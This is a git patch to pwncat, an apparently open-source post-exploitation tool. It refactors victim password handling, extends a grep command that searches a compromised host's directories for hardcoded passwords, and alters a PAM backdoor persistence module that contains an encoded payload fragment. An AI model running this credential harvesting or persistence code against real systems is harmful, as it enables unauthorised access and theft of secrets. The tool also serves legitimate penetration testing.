From 528088be77cc4e179ddee22a3ed6b4c120ecdb6f Mon Sep 17 00:00:00 2001
From: Caleb Stewart <caleb.stewart94@gmail.com>
Date: Thu, 4 Jun 2020 03:34:21 -0400
Subject: [PATCH] Fixed password config and enumeration

---
 pwncat/commands/set.py        | 8 ++++----
 pwncat/enumerate/passwords.py | 4 ++--
 pwncat/persist/pam.py         | 4 +++-
 3 files changed, 9 insertions(+), 7 deletions(-)

diff --git a/pwncat/commands/set.py b/pwncat/commands/set.py
index d21760a..c49dbd6 100644
--- a/pwncat/commands/set.py
+++ b/pwncat/commands/set.py
@@ -36,10 +36,10 @@ class Command(CommandDefinition):
         if args.password:
             if args.variable is None:
                 found = False
-                for user, props in pwncat.victim.users.items():
-                    if "password" in props and props["password"] is not None:
+                for name, user in pwncat.victim.users.items():
+                    if user.password is not None:
                         print(
-                            f" - {Fore.GREEN}{user}{Fore.RESET} -> {Fore.RED}{repr(props['password'])}{Fore.RESET}"
+                            f" - {Fore.GREEN}{user}{Fore.RESET} -> {Fore.RED}{repr(user.password)}{Fore.RESET}"
                         )
                         found = True
                 if not found:
@@ -50,7 +50,7 @@ class Command(CommandDefinition):
                 print(
                     f" - {Fore.GREEN}{args.variable}{Fore.RESET} -> {Fore.RED}{repr(args.value)}{Fore.RESET}"
                 )
-                pwncat.victim.users[args.variable]["password"] = args.value
+                pwncat.victim.users[args.variable].password = args.value
         else:
             if (
                 args.variable is not None
diff --git a/pwncat/enumerate/passwords.py b/pwncat/enumerate/passwords.py
index bea3d99..21be878 100644
--- a/pwncat/enumerate/passwords.py
+++ b/pwncat/enumerate/passwords.py
@@ -52,13 +52,13 @@ def enumerate() -> Generator[FactData, None, None]:
     locations = ["/var/www", "$HOME", "/opt", "/etc"]
     # The types of files which are "code". This means that we only recognize the
     # actual password if it is a literal value (enclosed in single or double quotes)
-    code_types = [".c", ".php", ".py", ".sh", ".pl", ".js", ".ini"]
+    code_types = [".c", ".php", ".py", ".sh", ".pl", ".js", ".ini", ".json"]
     grep = pwncat.victim.which("grep")
 
     if grep is None:
         return
 
-    command = f"{grep} -InRiE 'password[\"'\"'\"']?\\s*(=>|=|:)' {' '.join(locations)} 2>/dev/null"
+    command = f"{grep} -InriE 'password[\"'\"'\"']?\\s*(=>|=|:)' {' '.join(locations)} 2>/dev/null"
     with pwncat.victim.subprocess(command, "r") as filp:
         for line in filp:
             line = line.decode("utf-8").strip().split(":")
diff --git a/pwncat/persist/pam.py b/pwncat/persist/pam.py
index 2b89578..835b57f 100644
--- a/pwncat/persist/pam.py
+++ b/pwncat/persist/pam.py
@@ -114,7 +114,9 @@ Z3YpewogICAgIHJldHVybiBQQU1fSUdOT1JFOwp9Cg==
             pam_modules = "/usr/lib/security"
             try:
                 results = (
-                    pwncat.victim.env(["find", "/", "-name", "pam_deny.so"])
+                    pwncat.victim.run(
+                        "find / -name pam_deny.so 2>/dev/null | grep -v 'snap/'"
+                    )
                     .strip()
                     .decode("utf-8")
                 )